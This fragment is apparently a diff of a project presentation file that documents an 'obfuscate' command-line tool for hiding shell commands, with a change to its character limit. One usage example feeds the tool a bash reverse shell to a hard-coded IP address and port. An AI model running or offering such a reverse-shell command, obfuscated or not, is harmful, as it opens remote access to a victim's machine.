the-zammers/the-caterers/PRESENTATION.md

 - `./obfuscate -x 'echo "Hello, world!"'
 - `./obfuscate -x 'bash -c 'bash -i >& /dev/tcp/149.89.150.100/9001 0>&1''

 Watch out!
-Obfuscate is ONLY guaranteed to work on ASCII input with 100 or fewer distinct characters.
-Attempting to use it otherwise will throw an error.
+Obfuscate is ONLY guaranteed to work on ASCII input with 256 or fewer distinct characters.[^5] Attempting to use it otherwise will throw an error.